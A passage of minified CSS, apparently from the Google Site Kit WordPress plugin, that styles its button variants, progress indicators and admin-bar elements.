.mdc-button--raised:not(:disabled),#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:not(:disabled){background-color:#3c7251}.googlesitekit-plugin .mdc-button--raised:not(:disabled),#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--raised::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised::before,.googlesitekit-plugin .mdc-button--raised::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--raised::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised::before,.googlesitekit-plugin .mdc-button--raised::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--raised:hover::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--raised:not(.mdc-ripple-upgraded):focus::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--raised.mdc-ripple-upgraded--background-focused::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded--background-focused.mdc-button--raised::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--raised:not(.mdc-ripple-upgraded)::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--raised:not(.mdc-ripple-upgraded):active::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--raised.mdc-ripple-upgraded,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded.mdc-button--raised{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--raised.mdc-button--dense,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--dense.mdc-button--raised{border-radius:100px}.googlesitekit-plugin .mdc-button--raised:hover,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--raised:focus,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:focus{outline:none}.googlesitekit-plugin .mdc-button--danger:not(:disabled){background-color:#ac4220}.googlesitekit-plugin .mdc-button--danger:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--danger::before,.googlesitekit-plugin .mdc-button--danger::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--danger::before,.googlesitekit-plugin .mdc-button--danger::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--danger:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--danger:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--danger.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--danger:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--danger:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--danger.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--dropdown{background-image:url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2212%22%20height%3D%228%22%20viewBox%3D%220%200%2012%208%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d%3D%22M10.6.6L12%202%206%208%200%202%201.4.6%206%205.2z%22%20fill%3D%22%23757575%22%20fill-rule%3D%22evenodd%22%2F%3E%3C%2Fsvg%3E");background-position:calc(100% - 8px) center;background-repeat:no-repeat;background-size:9px 6px;letter-spacing:normal;padding-right:12px;text-transform:none}.googlesitekit-plugin .mdc-button--dropdown:not(:disabled){color:#161b18}@media(min-width: 600px){.googlesitekit-plugin .mdc-button--dropdown{padding-right:25px}}.googlesitekit-plugin .mdc-button--dropdown:hover,.googlesitekit-plugin .mdc-button--dropdown:active,.googlesitekit-plugin .mdc-button--dropdown:focus{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--dropdown:hover:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:active:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:focus:not(:disabled){background-color:#ebeef0}.googlesitekit-plugin .mdc-button--dropdown:hover:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:active:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--dropdown:hover::before,.googlesitekit-plugin .mdc-button--dropdown:hover::after,.googlesitekit-plugin .mdc-button--dropdown:active::before,.googlesitekit-plugin .mdc-button--dropdown:active::after,.googlesitekit-plugin .mdc-button--dropdown:focus::before,.googlesitekit-plugin .mdc-button--dropdown:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--dropdown:hover::before,.googlesitekit-plugin .mdc-button--dropdown:hover::after,.googlesitekit-plugin .mdc-button--dropdown:active::before,.googlesitekit-plugin .mdc-button--dropdown:active::after,.googlesitekit-plugin .mdc-button--dropdown:focus::before,.googlesitekit-plugin .mdc-button--dropdown:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--dropdown:hover:hover::before,.googlesitekit-plugin .mdc-button--dropdown:active:hover::before,.googlesitekit-plugin .mdc-button--dropdown:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--dropdown:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--dropdown:hover.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--dropdown:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--dropdown:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--dropdown:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--dropdown:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--dropdown:hover:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--dropdown:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--dropdown:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--dropdown:hover:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--dropdown:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--dropdown:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--dropdown:hover.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--dropdown:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--dropdown:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}@media(max-width: 599px){.googlesitekit-plugin .mdc-button--dropdown{background-image:none}}@media(max-width: 599px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}}@media(min-width: 600px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{max-width:220px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}}@media(min-width: 960px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{max-width:300px}}@media(min-width: 1280px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{max-width:450px}}.googlesitekit-plugin .mdc-button--inverse:not(:disabled){background-color:#161b18}.googlesitekit-plugin .mdc-button--inverse:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--inverse::before,.googlesitekit-plugin .mdc-button--inverse::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--inverse::before,.googlesitekit-plugin .mdc-button--inverse::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--inverse:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--inverse:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--inverse.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--inverse:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--inverse:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--inverse.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--tertiary{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;height:auto;letter-spacing:normal;min-height:40px;padding:8px 16px}.googlesitekit-plugin .mdc-button--tertiary:not(:disabled){color:#6c726e}.googlesitekit-plugin .mdc-button--tertiary:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--tertiary:hover:not(:disabled){background-color:rgba(22,27,24,.08)}.googlesitekit-plugin .mdc-button--tertiary:hover:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--tertiary:hover::before,.googlesitekit-plugin .mdc-button--tertiary:hover::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--tertiary:hover::before,.googlesitekit-plugin .mdc-button--tertiary:hover::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--tertiary:hover:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--tertiary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--tertiary:hover:not(:disabled){color:#161b18}.googlesitekit-plugin .mdc-button--tertiary:active,.googlesitekit-plugin .mdc-button--tertiary:focus{outline:none}.googlesitekit-plugin .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .mdc-button--tertiary:focus:not(:disabled){background-color:rgba(22,27,24,.26)}.googlesitekit-plugin .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .mdc-button--tertiary:focus:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--tertiary:active::before,.googlesitekit-plugin .mdc-button--tertiary:active::after,.googlesitekit-plugin .mdc-button--tertiary:focus::before,.googlesitekit-plugin .mdc-button--tertiary:focus::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--tertiary:active::before,.googlesitekit-plugin .mdc-button--tertiary:active::after,.googlesitekit-plugin .mdc-button--tertiary:focus::before,.googlesitekit-plugin .mdc-button--tertiary:focus::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--tertiary:active:hover::before,.googlesitekit-plugin .mdc-button--tertiary:focus:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--tertiary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--tertiary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--tertiary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .mdc-button--tertiary:focus:not(:disabled){color:#161b18}.googlesitekit-plugin .mdc-button--callout{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;height:auto;letter-spacing:normal;min-height:32px;padding:6px 16px}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:not(:disabled){color:#265c3b}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(:disabled){background-color:rgba(147,201,168,.6)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(:disabled){color:#265c3b}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus{outline:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(:disabled){background-color:#93c9a8}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(:disabled){color:#265c3b}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:disabled{color:rgba(38,92,59,.4)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:not(:disabled){color:#4e3300}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(:disabled){background-color:rgba(225,177,85,.6)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(:disabled){color:#4e3300}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus{outline:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(:disabled){background-color:#e1b155}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(:disabled){color:#4e3300}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:disabled{color:rgba(78,51,0,.4)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:not(:disabled){color:#7a1e00}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(:disabled){background-color:rgba(255,194,174,.6)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(:disabled){color:#7a1e00}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus{outline:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(:disabled){background-color:#ffc2ae}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(:disabled){color:#7a1e00}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:disabled{color:rgba(122,30,0,.4)}.googlesitekit-plugin .mdc-linear-progress,.googlesitekit-plugin #wpadminbar .googlesitekit-adminbar .mdc-linear-progress,#wpadminbar .googlesitekit-adminbar .googlesitekit-plugin .mdc-linear-progress{margin:32px 0}.googlesitekit-plugin .mdc-linear-progress .mdc-linear-progress__bar-inner,.googlesitekit-plugin .mdc-linear-progress #wpadminbar .googlesitekit-adminbar .mdc-linear-progress__bar-inner,#wpadminbar .googlesitekit-adminbar .googlesitekit-plugin .mdc-linear-progress .mdc-linear-progress__bar-inner,.googlesitekit-plugin #wpadminbar .googlesitekit-adminbar .mdc-linear-progress .mdc-linear-progress__bar-inner{background-color:#3c7251}@media(min-width: 960px){.googlesitekit-plugin .mdc-linear-progress,.googlesitekit-plugin #wpadminbar .googlesitekit-adminbar .mdc-linear-progress,#wpadminbar .googlesitekit-adminbar .googlesitekit-plugin .mdc-linear-progress{margin:48px 0}}.googlesitekit-plugin .mdc-linear-progress--small{max-width:150px}.googlesitekit-plugin .mdc-linear-progress--compress{margin:0}.googlesitekit-plugin .MuiCircularProgress-colorPrimary{color:#3c7251}.googlesitekit-plugin .MuiCircularProgress-colorSecondary{color:#108080}#wpadminbar .googlesitekit-adminbar *{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;line-height:normal}#wpadminbar .googlesitekit-adminbar .mdc-linear-progress{margin:32px 0}#wpadminbar .googlesitekit-adminbar .mdc-linear-progress .mdc-linear-progress__bar-inner{background-color:#446199}@media(min-width: 960px){#wpadminbar .googlesitekit-adminbar .mdc-linear-progress{margin:48px 0}}#wpadminbar .googlesitekit-plugin 